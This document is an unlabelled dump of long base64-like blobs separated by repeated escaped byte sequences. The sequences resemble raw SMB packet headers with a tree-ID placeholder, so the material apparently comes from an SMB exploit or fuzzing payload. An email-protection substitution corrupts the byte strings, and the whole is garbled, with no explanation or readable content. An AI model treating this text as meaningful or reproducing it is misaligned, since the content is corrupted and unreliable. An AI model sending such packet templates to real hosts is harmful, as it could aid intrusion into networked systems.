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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x83\\\\x00\\\\x00\\\\x00\\\\x10wPJm8PHqMWeiS36sgIuXwIS2D3xaSSlUbYUzVS7h3iF/FEtIGFlsdVBA90zAsqPglb86BtpVCgPsLoNhqtPT4pMxYeNUqQhw312pLqBG/qqW3e+kFyO9D7+WLBgPEaw/ua2z72R0zAqdO1Q4+Iq8JtmR9nSf+TIpzZMEy/QUC2qk2gN8Pv2a3yApVermnX+oTJBYt8Zt/Sd57YsbJtgCprWZz19Lb93RCf2FepoJOJf0u8NhRW+xKJ6mYIf1EjlqnMtfPC8D51UpfJA+xW/YYM1ET+P8iOqpvBhNWiIk6sPpIxCS9k2AwwRrNr0CIplCf/CCYV0Ap+Xn0+CYWkemQlU5UB0PFmg4N5KJj3UpjXMDnbSHpYCCVUZ4NEFJif2eYfysJJLV+QM1XB0fchTLZFcPF1HDyLTWfLjHCelO+bJyn16nVXyT3VF0yN9DUyXpNsZd6JCYNvVQFzn0zf1Jwbddxwd//XFWt7QKHuBu84cg8OuUrxytaqsKPQDAG9t+uMZ9QggsBc+poxiHYXZmrrpHFu5+GLIeBkGx37TJNU2DG9YhNfHvV76qMrymmRfPsQBgpyhXZZFNzzTyj/MTfyFhrdaC6Xj7ASE7w6milmSvbmVv75dDj2zT+GmgBzhrfgTMxll2i7ctB2sVc2wKuTX7vm3C/du/8wR47GTwUYi2I2Y617mkmI6CzfLy7DNWtq5eoj3dNiSZv3r8KjRictDai/CGIslGIBuNF2ydmcBQFJOM9E+MFTI456aWX8H5vFKz7oBxF8Krxc6GeJpFarQSpdcR6iHxv6wDFtzklyQ6kaKf/xo6MDNe222FfAhA9rMC72g0uoufIDhQVj8gkSrMj55aoux3jPMR0mDiRVez2Up0D/IZyk1R/+ONQPx6nmlgGueS8pIIY32+qtay3q9xJhwZzUSrkbw2zHmphQkqH1K69fVkELg5JfEoYLAS+snbTlJm8oqjnlWNeNGJSjXlrDNwa1Ypf9kCGUqT6kTkvvOwuzW+aFkZ720J923zQ7Tiq3vWg/yDQJrQN7C78XxHjdj58F2uaFhwrCJlFvfrtFRyMCkWmBflzhlnYRV6DvuQWcY7ktqwx8IfGucaKRrOyaw+HkZB3Vh8AMTe7FZXivmH84ny511JTf+bNSUsDzg6qLaSq/YJIY8vF+4M98xSXQrq7mfrYY95qEsqRvq7FTHWHvU8piO4vNBICvSs217Xs2UW/q4gQzhK6L3pV4YKkOnaNFoSFl7KnKnQDr5nvFGG7OxkfVJlJLcVTB0DYzC9/9pqnJWwTZBXrPtE/mcD5t6FANtxocMpjNnyHsvcTyAGAP6R+B+eR+qZiEZIXUPFaKGMUxvGy8OsF5tPZDePG1hYGF0+AtOdLXMAuN5uTdADW3lhmI2rHdv17PxLJqFBStliNmz0gAc//7PJr4JVXRAuALHUN59w5erW2THQGk2WfFLx3kGSb1RT3ftd8JXsL3+6ghXGLnXrhwg1xCP0O5AbGekemZwwlYUWrKLdGqR8ymemAbSOTvv3hu6Z6M5lyByGu/FjXviSrJNW64Soz5pQ976WnI6evPstE8t0PCfFZx5bLOVfQl5oFdtVRnzdGzQJRXTs3Nl65Azy/oxgZ8Fc74Me7/ddLt6Tk65fBLmqR15G3Wxwzb+dEcCR9RwjWrDv/A4tMlLEzNlj2EzHL95aUfVDXpDqm/YkwDrVqeMEzCVBngxV+9+AoDbrfeL8qLbtA3A/TX1ieYYP9sAkImWhd6w0dYSwj0W8oioWo42myG3J46m9auC0tjmhGt+bTan1IVhSdRbha2tuqS3a741NUNhhna41dnwTad4LFrGq60ZpnzX5qADOmhTuDGJa5lBho/tf29R/RjtkU3/dHpPBBNjDwYHnYPS+zQfk2mWelIXY+JkubNKuSsf2N5fwjLBkFgDS03HlH/hqr770BcGnFqMpkHvuonPL4A1QE0tE6fMwuxsAPKryLzAxH6gGVwZL3GjTFFM0m5h7afaV1/h1N+N6+A73a9qNWAyseX48Z83l1tyCpkgePI3mBzEVyI+ciDLRCZIaOAVgnFEzs0A5+s9qIlF71Wv0uGQGDUjvEfJzSdSRo0SYETcjM0t4gl3NTAX8n4drVAjATOT56W2PhR+X9iWM95If96kDqmazlG9dkooZmv+VCyYE6PPmNriCuJ3wVbCWFfnEAEa4p526tWqjyAtr74bBpofzAc1n4K5TCcjG/TPNhlbrEtYtBwyU+v60dnc+ydZ25qvsCKzgfM9bwldMC7IkXCRy2mcqwbLOtIslmm41ILFfZJ3p1fyZEG39w2bhppQjcOlMVXQ9ZQ2eeDkjdNfvlvCHKPh11OAiv2HPveYtmgQu+egwviHkts9kcULkex4u4NpEj5J4LoY84zDFqV4I/MkwIv/FnTOioOwVALr7toEQAPEw1ZBkozmOz+5vL//Y7Q4auAP7Em2c8iwpq6PGjEcKb9aQ3t4BrUMK05sFk5I3s2b3B3wdy29v9JFXIR1DLmclVW3kT+cfi+WHjK1nqqxAfQuJ03uhmBRBP6usKmwpas69GsR+IiqWq3EeLWzgji3fFcilTgPYmoQRBEc7zAyR6sfA7sgiCMO+SKIBkqlWUXHnKTML7u4vDBjHpNIvilB6hxgbFfjGriQaBSHcocNgHXmbPHssmOiMjs1Ywz70VltEjZv1gddPH+MZX/ojZMn3qW234k/J1WVnzbIXSJCrAQqtfNFq4u+NWganGL5j1p9MAtxGwJ2pI6zQAZuBX9xmD7C3dfcGiXsQGoC43IjI5tgJFPZcjuisLarGySx4DGbmqS1LBX7zM4Mk9YmgeehLsqEYBHBHH1nG1qiehpuSriXaDarhzDiYd09u2z9A7mdMUrgj73sfY57/Js9MbgLOoyQDHoSTGYgL5oNKD2i404mzzPg6w/ayLDGGAWTr16zxjcEHtbF6fKsNTHA3qRpsFTWSOd4p6hTpJ3XfD/+dxKr0kzu9xGBT/yn9H5AIHrS2nLzqILVSstzWV7mHaWiFxLshX/+r3O4jOVnAhF6ZflziFbf3NipUiWX7jJ7GAK/MD1c9Iwp8OOQkUtmkWvbfIm4DAvlfdU6u9gIwSF6occJdlmQpRSbFjSa+ozyh71UDvBdZOfQC+Ea35M9PDroP0dXkHrCL3zYnOEwoey0y0lnyw1vBkPmwl2pZ7Ue5+sFH4OW6uVLLuwucOk+HaixbXtbdQ49ozYeVb59oau8vt/hZHyHAHlo2GA3ftxH95kTkKdGtEbMfbdMxurHPTBKTm5MG6Y75759GekXc8YmxWD9nO5tFVaQvP8uRCt5q3hIycfQUnnzWBhAHD95r8ITOsP1f/USuQkXNdB+S1cevKIGnAvWBDPTKCZx0WleHC5gAS8r5qM/+GWmbqdGt4LcrgNQutixkgQh1jnDWCY0Td65cXHmKMYi4NRpgQu2Nyelth0SlOOalZtc8WGRFUrm2ZuCQpqSN9Z71t3PqXBOQIuQOvBm7DRt8LiOGWJ4Fgiw8zLUckIARWEUXUjklpNKgfWJR0DVxM6NGPBka6PlSXaaDn6cO35Likjr6hlVB8cOLTnmUzaUvSa3lR3RXRPG2rgZ3ARZALJ17t9dGs1u5EuNcl0UTmZ4FCpqYHadNm0frUnLz3f1VAHc/0/0jjEyMj+h4FMHHDslnvti7ajC1ws7EoOjVXfDV7GDyKJEr2CojIepkRTfLHNLMCd98YT1DYZRB/a8if3FzhYRMAZb1QKW9FiQi0HJra7eYXjA8cx4wZCq/M7XjTkXx6uSJUIGo45e6o6oE/PV/a18NryPB7YyO3tQz3BuSF3CKDxp3r4X+YgX+8yaQSKXmJVrXh3JLeSjtySsoYAUv49zfJVpmvsjXTXe1ZVXjg1dHXOB/286pHGYQsUSI1gPma99cJNVyLq/2NWfkvj67Kuu8gIuBOZpzsYvO8ZGSy4r+vj/kMIxyPqScm8n8oJmDkVyMvaSb/PIDjLf9gT41Zak2qiiobBtWWQlisXBNNLrx7VC9UYLDm4riZgYfVjvNI0DdSCzxwm880gSQghGcZDth6qfL//y/JWArPrY397u7IQDQ\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x93\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x10wTmraUrzXWEfHD1L07qNWDFDeqVkVNeNLgdHOpiYn9eR6PbyinvIIQoegYlW0IySopNdfCJfeQwPh5sbQa8ZUdSofQ13qkeX2e+niELSfzfltgyDQy36ZrqXsoGnmkCBkcWGjSA41I0h7b/KLvyDxbyiVFBmkD7M7ED8wfWjSjMVVYMgsD+VN6K3+Y4EkMHiaClZrqhlPNpou9nHHpX5bR8fS15KSItkfW7qDVmvX1lAuwXGxDZDNvvBxeOokS6Ovsp1ar412A8FGdOOWlc/Mj3yAYo0xt9eeW+pS6jXCYwiWqzvD2Gm8tf1EVfsfFvHqKPkOYhFvOZTfa9PCLAOPtymNu6BgV4gco3AeT4L59JFsYBaX1qHyTeFB0SRBqEHWAIv5dNL5lSYCq/1NVzWPf5n6Uc+289bgNgkkj2CCxVjbePMB3qnOm0HgPr6NDj6TGaq0r+qBtBENNMoW4/bFmlG3Gg/HVGlkhfbu8seDsbQsOkqoeIdcsUJy3OTSZc3jBaIVJZhZmaBZnVjbBdDA7xlIpTiUJnN7KBuPvdQKFjesNpF+/jdNI0nYWX5P4nU+Kt6BDDnaQCfoo8M3YYUZMDzr/m1MCo5NWkjVUVb+qQSxCXqFST/5i5vNVr90mg9uQEzX/KfQhEYmjPwib+7Cg2gLEiczM8bujZkmwux2s54EFB7KsGXH3A5Vh/xTtAhMheH87dl5HGXB/6X4QVegZSXwc/eArrR8n7x5cB8lO3eZI2j2ciQo6nsBc+D7vm0gjgrRzw5b3Td+Lt6V+azRlR8/Jez/xMW8ievM76g9DixTSCcfo3Qn7JX5tAMYJ9mc7Xm/6ejXMRenHblLcCCsppRy2stRvaPx9L3wpYbXARyNJRplQHgTTQhXUoKg2BjKpWcJYc3S2OBp5MSYZ3p5xYDewJVcYEV5CGv9u5GzACbmgxOH5t+IqR6wQMdBCarojjXjnpg2cV/JOEGQFMFy6z8DiTkIdUIAMypHo/FogSqbEFeS5cATqU7yk+sN/4sDv0J3kYCXlI1VWGOPCPeV/TlKYHi+JAtr5JqjzoZpBXYhrKUWEWIE8Pb5wTjdq/CPMBseTD/6Sw9N9MyBg9PTgoaZ5fDA+NzEJld/cyrDaJFmSpHFnnUKs2YB9afm3EtkG7Q4S0TykC6HxVwje5EdZsGG5AVfHJSGpc5THJCvXbst76Wnni8cTYZ3VHuLqSH3RBb1scfcvLKeM31MkqT1SW3pag/lpbVTAhI94Q/J/P2RcwJHyM7SJscu9BJB9vFldojKlxp5umYd1lwxgUaEoBVtk/5CFJzB6AfS/XhxmzEJTz0S7hn0P5W2XEQ7KjOyRQBl+QVbu8d+LnDBAdhC+pkvQYHQeB5hXW2/7byNxoZJ9blUl0J5QC2qs566ntOWJxpBzGFQqHcNWAAUcW8YAJ4Ay7qtdrNSfSTP78pxyzJ8NiAxs8OaU6dkuYbkPV1ZK3vLnhaDVZMr1Uxr6c5eiuFS5F9zA0Y5Tlvj97PQO0Ux2JD7A40Kjhtm0Vq6yVd3iXxlQ1NJs72MMIHqmciv0E2ACx61hvSgnyN2MeoefeNQE74w1UpU1cegoWZkvwZbTBc+2iN+dOQkmWWc8rHEbFrYT73FJ419GN52GBczKFe1+5dvwjTV2i3D9JKTaBUTTnQe18exClzJ9dObbiwgPkWpd52XY3Kzso2A7aPbZywY4gT4xU/TXTWOfa++kcZeEyZPVhA7nYAQ8mATGrSANlJbkOby48Rt9oaGVxjhC/bd8Y7Zm0y5NfyoR76PcwDlloSkftk+KjpSKA4RwJf3k9Z/cqhJ3tR3IQJM+S8izwvnuc+h6wwaY8n8o7Aacar1mgWyo5g63EIHMnftqKnTrgXCPsd6H6fznkqNRjK/pyW2bJXYLZiT8Jvo7faAFjNTfPPFM06F+0YsFgxZ+bCI3Sb9/NjaE5gvQMixyO13xtp1X2/2xzsBoVkYT7gqbONP9wNsOHP5uhpj/PLHWLT26K6L83oD5UZgJuIomdA2cOSzI+SU5J9Wc/GNysTAAB4A5JchDFnfyVVhxfexjoQ19HE4ctdxuhxCXMh2oQfHkYe2cxb1Y3Q6uH4RK4arOrWXNtnguJjYGMMXTCTtKyODq/jcFqkRhtipN9m/tXHTmocJX+8yxUJkrqii2gN78ZTXGuMYcmli5xBAXC/QxYOyQv4cs3hWea511fB8idliLHC2l1nYd2tklRf04bSMxBlcZadNGXxSgVZxUuAl+ko7uNVefmV/ZI7BWGsb8XuoHcnG3dalSvtoNC7rLrlMfTujYjO7s5PpmsqHB6ZUPLOvpwFen0CFgmw0VskiuRJua+yDPuBT952/0rK8rGeCd740BZzfOf88urO/iaqTDlJSXqnnwSxCg6ETb82RqCQCV7fLIzhflZIVI1jYwDRD52zD/FU3WCrodEeM2HOgCCPqxe0XKNyiYMlJ2AfKgcjIJJRO0PQXQS8XAjF9bscH3jAgucHgd/L8CSAbakddmQoVheibG8whSS4Yn9v5YCwAEKJ4U9yk561d4AF2eE3zX0UU231oSScyGgZL4udKz+vTbY1LP7QyXRtnDL68MIMN2/OEd53/+VLo9KPeeK65Xae5bfYW7xOJfHVAnmd38wMhK3RRGjU0CrUB+doZgQpWK+EE+arsxohuImQiQaeKrA8yK9hWDQsX5ayRyJl/LmvItBoNW/9wlpP80ZHQYBEewqI+yPpysUgd82W7//4uFs5lwPJj30nKg3sJNJM500+FHK9yHrLMYSIckTsok2oUKK1v0JybjS6BZdtcBSuDCo7kGhF39r/YkUICZujPfRurg2WbM+jaw8sN7gKhbgRgv1HukS7Sq0GEif6VwY